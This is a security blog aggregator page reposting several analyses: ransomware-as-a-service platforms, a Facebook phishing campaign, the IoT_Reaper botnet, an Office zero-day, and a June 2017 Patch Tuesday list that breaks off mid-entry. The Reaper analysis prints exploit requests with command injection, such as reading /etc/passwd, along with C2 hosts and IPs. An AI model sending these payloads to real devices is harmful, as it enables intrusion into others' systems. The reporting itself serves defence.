Blogy - Úvod  Odborné èlánky (42)  Bleskovky (0)  Témata (6)  List  EN  CZ  Seriály  Blogy  Newspaper  Magazines  Knihy    

Úvod  Bug (0) Malware (1) Hacking (0) Vulnerebility (4) BigBrother (0) Exploit (1) Ransomware (0) IoT (1) Phishing (1) Computer Attack (1)


 


ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS

19.4.2018 Malware blog

Introduction
Over the years, the diffusion of darknets has created new illegal business models. Along with classic illegal goods such as drugs and payment card data, other services appeared in the criminal underground, including hacking services and malware development. New platforms allow crooks without any technical skills to create their own ransomware and spread it.

Ransomware is malicious code that infects the victims’ machines and blocks or encrypts their files, requesting the payment of a ransom. When ransomware is installed on a victim machine, it searches for and targets sensitive files and data, including financial data, databases and personal files. Ransomware is developed to make the victim’ machine unusable. The user has only two options: pay the ransom without having the guarantee of getting back the original files or format the PC disconnecting it from the Internet.

Ransomware history
The first ransomware was born in 1989 when 20,000 floppy disks were dispatched as “AIDS Information-introductory Diskettes,” and after 90 reboots, the software hid directories and encrypted the names of files on the customer’s computer, claiming a ransom of $189. The payment had to be done depositing the requested amount at a post office box in Panama.

After many years, in May 2005, GpCode, TROJ.RANSOM.A, Archiveus, Krotten, and others appeared and in the threat landscape-

With the advent of the new anonymous payment method, such as Bitcoin, at the end of 2008, the ransomware has adopted mew payment methods.

Many ransomware families such as CryptoLocker, TeslaCrypt, and Locky compromised an impressive number of systems worldwide, but the WannaCry Ransomware Attack is currently considered the most devastating of all cyber-attacks.

In a few hours after discovery, the malware was able to infect more than 230k machines exploiting a vulnerability in the SMB protocol. Despite its unexpected worm-like behavior, WannaCry continued to encrypt the user files using the classic methods but asked for a payment of $300.

The samples related to the last ten years attacks could be grouped into two different categories:

Locker-ransomware: is ransomware that locks users out of their devices
Crypto-ransomware: is ransomware that encrypts files, directories, and hard drives
The first type was used between 2008 and 2011. It was discarded because it was quite simple to eliminate the infection without paying the ransom. In fact, the locker-ransomware has a weakness. It shows a window that denies access to the computer, but the ransomware lock was easy to bypass.

The second type does not have this problem because crypto-malware directly hits the users’ files and denies the victim usage of the system. Obviously, the user cannot access the information contained in the encrypted files.

Then the next ransomware uses the same encrypting approach of the second ones, but they involve a combination of advanced distribution efforts and development techniques used to ensure evasion and anti-analysis, as Locky and WannaCry attest.

Obviously, the creation of ransomware needs specific and advanced skills, but the great interest of criminal organization in the extortion model implemented by this kind of malware pushed the creation of new services that allows crooks to create their ransomware without having specific knowledge. Welcome to the Ransomware-as-a-Service (RaaS) business model.

Ransomware-as-a-Service
The rise of the RaaS business model is giving wannabe criminals an effortless way to launch a cyber-extortion campaign without having technical expertise, and it is the cause of flooding the market with new ransomware strains.

Ransomware-as-a-Service is a profitable model for both malware sellers and their customers. Malware sellers, using this approach, can acquire new infection vectors and could potentially reach new victims that they are not able to reach through a conventional approach, such as email spamming or compromised website. RaaS customers can easily obtain ransomware via RaaS portals, just by configuring a few features and distributing the malware to unwitting victims.

Naturally, RaaS platforms cannot be found on the Clearnet, so they are hidden into the dark side of the Internet, the Dark Web.

Surfing the dark web through unconventional search engines, you can find several websites that offer RaaS. Each one provides different features for their ransomware allowing users to select the file extensions considered by the encrypting phase; the ransom demanded to the victim and other technical functionality that the malware will implement.

Furthermore, beyond the usage of RaaS platforms, the purchase of custom malicious software can be made through crime forums or websites where one can hire a hacker for the creation of one’s personal malware. Historically, this commerce has always existed, but it was specialized into cyber-attacks, such as espionage, hack of accounts and website defacement. Only when hackers understood it could be profitable, they started to provide this specific service.

The supply of this type of service is offered substantially in two ways: hiring someone to write malware with the requirements defined by the customer or using a Ransomware-as-a-Service platform.

RaaSberry
RaaSberry provides customized ransomware packages that are ready to be distributed. The packages are pre-compiled with a Bitcoin address provided by the customers, and the platform creators do not receive any form of payment from your victims.

Once the ransomware is executed on your victim’s computer, it will encrypt every file type that was specified when you created it. It examines all local drives and mapped network drives, and encrypts the files with a unique 265-bit AES key that is generated on-the-fly. The AES key is then encrypted using your unique RSA key and uploaded.

Upon completion, the desktop wallpaper will be changed to an image with instructions for paying the ransom. A text file is also created in each folder where there are encrypted files with instructions. The instructions are available in English, Spanish, Mandarin, Hindi, Arabic, Portuguese, Russian, Japanese, German, Italian, Vietnamese, Korean, French, Tamil, and Punjabi.

After the victim has paid, the AES key is provided back to the program to allow decryption. Many ransomware programs require the victim to download a separate decryptor, but RaaSberry has built-in decryption once the COMMAND AND CONTROL server provides the AES key. If you are not subscribed to the COMMAND AND CONTROL service, you can still provide decryption service via email by manually decrypting the victim’s AES key. There are several sections on this website: About, Login, Register and Support. The About sections describes how you can create your personal ransomware.

A set of statistics about the ransomware campaign, keeping track of the number of infections, the number of paying people and the relative monetary earning are available in the user’s personal section.

In this dashboard, you can purchase new packages that include, for each plan, the same ransomware but a different subscription length to Command and Control. As shown in the following figure, there are several plans:

Plastic: One-month COMMAND AND CONTROL subscription – $60
Bronze: Three-month COMMAND AND CONTROL subscription – $150
Silver: Six-month COMMAND AND CONTROL subscription – $250
Gold: One-year COMMAND AND CONTROL subscription – $400
Platinum: Three years COMMAND AND CONTROL subscription – $650

Once the users registered to the platform and purchased a new package, the platform assigns them a personal bitcoin address. They can control statistics about the ransomware campaign and check their earnings.

Furthermore, you can ask for assistance to the creator of this platform, sending an ad hoc email.

Ranion
Another platform that offers a similar service is Ranion. The novelty is that the Ranion team declares that the COMMAND AND CONTROL of their “Fully UnDetectable” ransomware is established in the Darknet. This site is continuously updated by their operators.

On their website, the Ranion team shows an example of the COMMAND AND CONTROL dashboard. In the next figure, we can observe the subscription time and when it expires, as well as the infected machines classified by Computer ID, the username of the victim, operation system, IP Address, date of infection, number of encrypted files and the relative encryption key.

In this dashboard, users can purchase new packages that include, for each plan, the same ransomware but a different subscription time to the Command and Control. As shown in the next figure, there are two plans in which the ransomware is the same, but there is a different subscription time to the COMMAND AND CONTROL dashboard, and with, obviously, different prices.

The next figure shows the explicit the Bitcoin address, who sends the package’s price, and email to contact with the furthering information required:

Chosen package
Your bitcoin address used to send money
Your own Bitcoin address to receive money from your Clients
Your price to receive from your Clients
Your email address to get contacted by your Clients
If you want to keep track of IPs of your Clients ( enabled by default )
Optional additions

The Ransomware Decrypter is shown in the next figure. This is used by the victims to decrypt files with the key sent by the criminals once they have paid the ransom. Pressing the “decrypt my files” button, the decryption process of files starts.

EarthRansomware
Another RaaS platform is earthRansomware. The following image shows home page of the site. Customers can log in to in the platform after buying their personal ransomware contacting the EarthRansomware team by email.

The website included a session that provided step by step tutorial for services.

Unlike the previous RaaS, this one offers the fixed-rate service at the price of 0.3 BTC. When the customer pays the quote to the bitcoin address indicated in the mail, he obtains his credentials to enter in the personal section.

ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

In this area of the site, users can customize their ransomware settings:

Amount of bitcoins you require
Your email address
First payment deadline – Last payment deadline
Bitcoin address

Once a system is infected, the malware will show the ransom note notifying victims the deadline for the payment and instructions to pay the ransom.

Redfox ransomware
Redfox is unique Ransom-as-a-service platform because differently from the others, it is hosted on the Clearnet. This ransomware, according to the description provided by the developing team, is the most advanced and customizable malware. RedFox encrypts all user files and shared drives using the BlowFish algorithm.

The webpage says that the Command and Control, which is hosted in the Tor network, allows users to choose the ransom amount, the payment mode, payment deadline, personalize the ransom note and other technical features. The RaaS allows its customers to choose the usage of binders, packers, and crypters to guarantee anti-analysis of the sample.

The website does not contain examples or tutorials about the command and control usage. However, users can pay and download all the stuff needed to build up the criminal infrastructure.

Createyourownransomware
A totally-free platform, found in the darknet, is Createyourownransomware, its website allows users to download ready-to-go ransomware filling only thee boxes in a form:

the Bitcoin address to which you want to receive your “money cut.”
the ransom amount
a simple captcha.
The “money cut” corresponds to 90% of the ransom amount, the remaining amount is the fee that RaaS administrators keep for them to provide the service.

Once the users have filled out the form, the platform will instantly build a new sample and show the link to download the malware. Furthermore, a second webpage shows some statistics about the ransomware campaign, such as the number of infected machines and the number of the paid ransoms.

The user interface of the RaaS, unlike the previous platforms, is very minimal and provides only a few features.

Datakeeper
Datakeeper, along with GandCrab and Saturn, is one the most recent RaaS platforms appearing in the threat landscape. The ransomware created through these platforms infected many machines at the beginning of 2018 demonstrating the increasing interest in the use of the Ransomware-as-a-Service platforms. Currently, only the Datakeeper service was not blocked by law enforcement.

When users register at the website, they can configure their ransomware by choosing a set of features. This platform seems to be one of the more complete because it allows specifying which extension of the files to encrypt.

Datakeeper team holds 0.5 bitcoin as a service fee for each infection.

In the “Additional files” section, users can download the utility to decrypt the ciphered files.

The following figure shows an example ransom note dropped on the victim’s machine.


Facebook Phishing Targeted iOS and Android Users from Germany, Sweden and Finland

6.11.2017 F-Secure blog
Two weeks ago, a co-worker received a message in Facebook Messenger from his friend. Based on the message, it seemed that the sender was telling the recipient that he was part of a video in order to lure him into clicking it.

Facebook Messenger message and the corresponding Facebook Page

The shortened link was initially redirecting to Youtube.com, but was later on changed to redirect to yet another shortened link – po.st:

Changes in the Picsee short link

The po.st shortened link supported two types of redirection links – original link and smart links. If the device that accessed the URL was running in iOS or Android, it was redirected to the utm.io shortened link, otherwise it was redirected to smarturl.it.

The short link with the smart links

So for the iOS and Android users, they were served with the following phishing page:

Phishing page for utm.io short link

For the rest of the devices, the users ended up with the smarturl.it link that went through several redirections which eventually led to contenidoviral.net. That page contained an ad-affiliate URL which redirected to mobusi.com, a mobile advertising company.

Phishing page’s ad-affiliate URL

Based on the data from the links, the campaign began last October 15th when it targeted mostly Swedish users. On the 17th, it moved to targeting Finnish users. Then from 19th onwards, it mostly went after German users.

The total number of clicks for the entire campaign reached almost 200,000, where close to 80% of the visitors were from Germany, Sweden and Finland.

Statistics from po.st tracking page

The campaign ran for two weeks with a main motive of stealing Facebook credentials from iOS and Android users. The cybercriminals used those stolen credentials to spread the malicious links, and subsequently gather more credentials. However, while in the process of stealing the credentials, the cybercriminals also attempted to earn from other non-iOS and non-Android users through ad-fraud.

This practice of using email addresses in place of unique names as account credentials creates a big opportunity for phishers. Just by launching this Facebook phishing campaign, they can mass harvest email and password credentials that are later on used for secondary attacks such as gaining access to other systems or services that could have a bigger monetary value because of password reuse.

We highly recommend the affected users to change their passwords as soon as possible, including other systems and services where the same compromised password was used.

URLs:

hxxp://lnk[.]pics/19S3Y
hxxp://lnk[.]pics/18JDK
hxxp://lnk[.]pics/196OV
hxxp://lnk[.]pics/18XH7
hxxp://lnk[.]pics/196PN
hxxp://lnk[.]pics/19LBP
hxxp://lnk[.]pics/18YZV
hxxp://lnk[.]pics/18QZW
hxxp://lnk[.]pics/196PA
hxxp://lnk[.]pics/19XK7
hxxp://lnk[.]pics/18HFX
hxxp://lnk[.]pics/19S3L
hxxp://lnk[.]pics/18J7S
hxxp://lnk[.]pics/19XKF
hxxp://lnk[.]pics/19K94
hxxp://lnk[.]pics/19LBW
hxxp://pics[.]ee/188g7
hxxp://pics[.]ee/18cdl
hxxp://po[.]st/ORyChA
hxxp://smarturl[.]it/02xuof
hxxp://utm[.]io/290459
hxxp://at.contenidoviral[.]net


RickRolled by none other than IoTReaper

6.11.2017 F-secure blog
IoT_Reaper overview
IoT_Reaper, or the Reaper in short, is a Linux bot targeting embedded devices like webcams and home router boxes. Reaper is somewhat loosely based on the Mirai source code, but instead of using a set of admin credentials, the Reaper tries to exploit device HTTP control interfaces.

It uses a range of vulnerabilities (a total of ten as of this writing), from years 2013-2017. All of the vulnerabilities have been fixed by the vendors, but how well are the actual devices updated is another matter. According to some reports, we are talking about a ballpark of millions of infected devices.

In this blogpost, we just wanted to add up some minor details to good reports already published by Netlab 360 [1], CheckPoint [2], Radware [3] and others.

Execution overview
When the Reaper enters device, it does some pretty intense actions in order to disrupt the devices monitoring capabilities. For example, it just brutally deletes a folder “/var/log” with “rm -rf”.
Another action is to disable the Linux watchdog daemon, if present, by sending a specific IOCTL to watchdog device:

watchdog

After the initialization, the Reaper spawns a set of processes for different roles:

Poll the command and control servers for instructions
Start a simple status reporting server listening on port 23 (telnet)
Start apparently unused service in port 48099
Start scanning for vulnerable devices
All the child processes run with a random name, such as “6rtr2aur1qtrb”.

String obfuscation
The Reaper’s spawned child processes use a trivial form of string obfuscation, which is surprisingly effective. The main process doesn’t use any obfuscation, but all child processes use this simple scheme when they start executing. Basically, it’s a single-byte XOR (0x22), but the way the data is arranged in memory makes it a bit challenging to connect the data to code.

Main process allocates a table in heap and copies the XOR-encoded data in. Later when the child processes want to reference to particular encoded data, it decodes it in heap and references the decoded data with a numeric index. After usage, the data is decoded back to its original form.

The following screenshot is a good presentation of the procedure:

decrypt

Command and Control
The Reaper polls periodically a fixed set of C2 servers:

weruuoqweiur.com, e.hl852.com, e.ha859.com and 27.102.101.121

The control messages and replies are transmitted over a clear-text HTTP, and the beacons are using the following format:

/rx/hx.php?mac=%s%s&type=%s&port=%s&ver=%s&act=%d
The protocol is very simple: basically there are only two major functions – shutdown or execute arbitrary payload using the system shell.

Port scanning
One of the child processes starts to scan for vulnerable victims. In addition to randomly generated IP addresses, Reaper uses nine hard-coded addresses for some unkown reason. The addess is scanned with a set of apparently random-looking set of ports, and then with a set of bit more familiar ports:

80, 81, 82, 83, 84, 88, 1080, 3000, 3749, 8001, 8060, 8080, 8081, 8090, 8443, 8880, 10000

In fact, the randomish ports are just byte-swapped presentation of the above port list. So for example, 8880 = 0x22b0 turns to 0xb022 = 45090. The reason for this is still unknown.

It is possible that the author was just lazy and left off some endianness handling code, or maybe it is some other error in the programming logic. Some of the IoT-devices are big-endian, so the ports need to be swapped in order to use them with socket code.

Screenshot of the hard-coded list of ports:

ports

This is the list of hard-coded IP-addresses:

217.155.58.226
85.229.43.75
213.185.228.42
218.186.0.186
103.56.233.78
103.245.77.113
116.58.254.40
201.242.171.137
36.85.177.3

Exploitation
If the Reaper finds promising victim, it next tries to send HTTP-based exploit payload to the target. A total of ten different exploits have been observed so far, and they are related to IoT devices HTTP-based control interface. Here’s a list of the targeted vulnerabilities and HTTP requests associated with them:

1 – Unauthenticated Remote Command Execution for D-Link DIR-600 and DIR-300

Exploit URI: POST /command.php HTTP/1.1

2 – CVE-2017-8225: exploitation of custom GoAhead HTTP server in several IP cameras

GET /system.ini?loginuse&loginpas HTTP/1.1

3 – Exploiting Netgear ReadyNAS Surveillance unauthenticated Remote Command Execution vulnerability

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%%27echo+nuuo+123456;%%27 HTTP/1.1

4 – Exploiting of Vacron NVR through Remote Command Execution

GET /board.cgi?cmd=cat%%20/etc/passwd HTTP/1.1

5 – Exploiting an unauthenticated RCE to list user accounts and their clear text passwords on D-Link 850L wireless routers

POST /hedwig.cgi HTTP/1.1

6 – Exploiting a Linksys E1500/E2500 vulnerability caused by missing input validation

POST /apply.cgi HTTP/1.1

7 – Exploiting of Netgear DGN DSL modems and routers using an unauthenticated Remote Command Execution

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&curpath=/&currentsetting.htm=1cmd=echo+dgn+123456 HTTP/1.1

8 – Exploiting of AVTech IP cameras, DVRs and NVRs through an unauthenticated information leak and authentication bypass

GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1

9 – Exploiting DVRs running a custom web server with the distinctive HTTP Server header ‘JAWS/1.0’.

GET /shell?echo+jaws+123456;cat+/proc/cpuinfo HTTP/1.1

10 – Unauthenticated remote access to D-Link DIR-645 devices

POST /getcfg.php HTTP/1.1

Other details and The Roll
Reaper makes connection checks to google DNS server 8.8.8.8. It won’t run without this connectivity.
There is no hard-coded payload functionality in this variant. The bot is supposedly receiving the actual functionality, like DDoS instructions, over the control channel.
The code contains an unused rickrolling link (yes, I was rickrolled)
Output from IDAPython tool that dumps encoded strings (rickrolling is the second one):

rickroll

Sample hash
Analysis on this post is based on a single version of the Reaper (md5:37798a42df6335cb632f9d8c8430daec)


New Office 0day (CVE-2017-11826) Exploited in the Wild

15.10.2017
On September 28, 2017, Qihoo 360 Core Security (@360CoreSec) detected an in-the-wild attack that leveraged CVE-2017-11826, an office 0day vulnerability. This vulnerability exists in all the supported office versions. The attack only targeted limited customers. The attacker embedded malicious .docx in the RTF files. Through reversing analysis of the sample C&C, we found that the attack was initiated in August and the launch date of the attack can be dated back to September. It was in this time window that the vulnerability has been exploited as a 0day.

Qihoo 360 Core Security has been the first security vendor to share the details of the vulnerability and coordinated with Microsoft to disclose the news, as well as a timely patch to resolve the Office 0day vulnerability in a week.

The latest version of 360 security products could detect and prevent exploitation of this vulnerability. In the meanwhile, we also highly suggest users to update Microsoft Patch in time.

The In-the-Wild Attack
This attack that Qihoo 360 detected in the wild is initiated with RTF (Rich Text Format) files. The RTF file contains highly targeted phishing subfiles to allure user to open. The attacker triggered a remote arbitrary code execution by using Microsoft Word tags and corresponding attributions. The payload delivery is showed in the below procedure. In this process,the execution code took advantage of a dll hijack vulnerability from a well-known security software. Aftwards, a remote Trojan aiming at stealing sensitive data was installed in the victims’ devices.

Summary & Security Advice
Upon the detection of this 0day vulnerability, 360 has released a hot patch which is available in the latest updates. It enables 360 users to avoid attacks exploiting this new Office vulnerability before Patch Tuesday. Attacks using office 0day vulnerabilities targeting common users have been increasing since the beginning of 2017.

We would like to send a kind reminder to all users that please do not to open any unknown office files. Organizations and enterprises should also be aware of this new 0day and be more cautious of related malicious behaviors. It is also highly recommended to update your 360 security software to protect your devices against any potential attacks.

Acknowledgement
Thanks to Yang Kang, Ding Maoyin, Song Shenlei, Qihoo 360 Core Security and Microsoft Active Protections Program (MAPP) for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us in resolving this issue.

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826


Microsoft Patch Tuesday – June 2017

11.7.2017 Symantec  Vulnerebility blog 

This month the vendor has patched 94 vulnerabilities, 18 of which are rated Critical.
Hello, welcome to this month's blog on the Microsoft patch release. This month the vendor has patched 94 vulnerabilities, 18 of which are rated Critical.

As always, customers are advised to follow these security best practices:

Install vendor patches as soon as they are available.
Run all software with the least privileges required while still maintaining functionality.
Avoid handling files from unknown or questionable sources.
Never visit sites of unknown or questionable integrity.
Block external access at the network perimeter to all key systems unless specific access is required.
Microsoft's summary of the June 2017 releases can be found here:
https://portal.msrc.microsoft.com/en-us/security-guidance

This month's update covers vulnerabilities in:

Microsoft Internet Explorer
Microsoft Edge
Microsoft Office
Microsoft Hyper-V
Microsoft Uniscribe
Windows Graphics
Microsoft Windows
The following is a breakdown of the issues being addressed this month:

Cumulative Security Update for Microsoft Internet Explorer and Edge

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8496) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8497) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8517) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8520) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory.This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8522) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8524) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8548) MS Rating: Critical

A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Remote Code Execution Vulnerability (CVE-2017-8549) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8499) MS Rating: Critical

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8519) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Scripting Engine Memory Corruption Vulnerability (CVE-2017-8521) MS Rating: Important

A remote code execution vulnerability exists in the way the Microsoft Edge JavaScript scripting engine handles objects in memory. This may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8523) MS Rating: Important

A security bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. An attacker can exploit this issue to trick a user into loading a page with malicious content.

Microsoft Browser Information Disclosure Vulnerability (CVE-2017-8529) MS Rating: Important

An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8530) MS Rating: Important

A security bypass vulnerability that affects Microsoft Edge.

Internet Explorer Memory Corruption Vulnerability (CVE-2017-8547) MS Rating: Important

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. This vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8555) MS Rating: Important

A security bypass vulnerability exists when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker can exploit this issue to trick a user into loading a web page with malicious content.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8498) MS Rating: Moderate

An information disclosure vulnerability exists in Microsoft Edge that allows JavaScript XML DOM objects to detect installed browser extensions. To exploit the vulnerability, in a web-based attack scenario, an attacker could host a malicious website in an attempt to make a user visit it.

Microsoft Edge Information Disclosure Vulnerability (CVE-2017-8504) MS Rating: Low

An information disclosure vulnerability exists when the Microsoft Edge Fetch API incorrectly handles a filtered response type. An attacker could use the vulnerability to read the URL of a cross-origin request.

Cumulative Security Update for Microsoft Office

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-0260) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8506) MS Rating: Important

A remote code execution vulnerability exists when Office improperly validates input before loading dynamic link library (DLL) files. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Memory Corruption Vulnerability (CVE-2017-8507) MS Rating: Important

A remote code execution vulnerability exists in the way that Microsoft Outlook parses specially crafted email messages. An attacker who successfully exploited this issue could take control of an affected system.

Microsoft Office Security Feature Bypass Vulnerability (CVE-2017-8508) MS Rating: Important

A security bypass vulnerability exists in Microsoft Office software when it improperly handles the parsing of file formats. The security bypass by itself does not allow arbitrary code execution.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8509) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8510) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

MicrosoftOffice Remote Code Execution Vulnerability (CVE-2017-8511) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8512) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2017-8513) MS Rating: Important

A remote code execution vulnerability exist in Microsoft Office software when the Office software fails to properly handle objects in memory. An attacker who successfully exploited this issue could use a specially crafted file to perform actions in the security context of the current user.

Microsoft SharePoint Reflective XSS Vulnerability (CVE-2017-8514) MS Rating: Important

A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

Microsoft Outlook for Mac Spoofing Vulnerability (CVE-2017-8545) MS Rating: Important

A spoofing vulnerability exists when Microsoft Outlook for Mac does not sanitize html or treat it in a safe manner. An attacker who successfully tricked the user could gain access to the user's authentication information or login credentials.

Microsoft SharePoint XSS vulnerability (CVE-2017-8551) MS Rating: Important

A privilege escalation vulnerability exists when SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. Successful exploits may allow an attacker to perform cross-site scripting attacks.

Cumulative Security Update for Microsoft Windows Hyper-V

Hypervisor Code Integrity Elevation of Privilege Vulnerability (CVE-2017-0193) MS Rating: Important

A privilege escalation vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels. An attacker who successfully exploited this issue could gain elevated privileges on a target guest operating system.

Cumulative Security Update for Skype for Business

Skype for Business Remote Code Execution Vulnerability (CVE-2017-8550) MS Rating: Critical

A remote code execution vulnerability exists when Skype for Business and Microsoft Lync Servers fail to properly sanitize specially crafted content. An authenticated attacker who successfully exploited this issue could execute HTML and JavaScript content in the Skype for Business or Lync context.

Cumulative Security Update for Microsoft Windows Uniscribe

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8527) MS Rating: Critical

A remote code execution vulnerability exist when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8528) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-0283) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker can exploit this issue could take control of the affected system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0282) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0284) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0285) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-8534) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user�s system.

Cumulative Security Update for Microsoft Windows Graphics

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0286) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0287) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0288) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0289) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8531) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8532) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8533) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information further compromise the user�s system.

Cumulative Security Update for Microsoft Windows Kernel-Mode Drivers

Windows Kernel Elevation of Privilege Vulnerability (CVE-2017-0297) MS Rating: Important

A privilege escalation vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited this issue could execute code with elevated permissions.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0299) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0300) MS Rating: Important

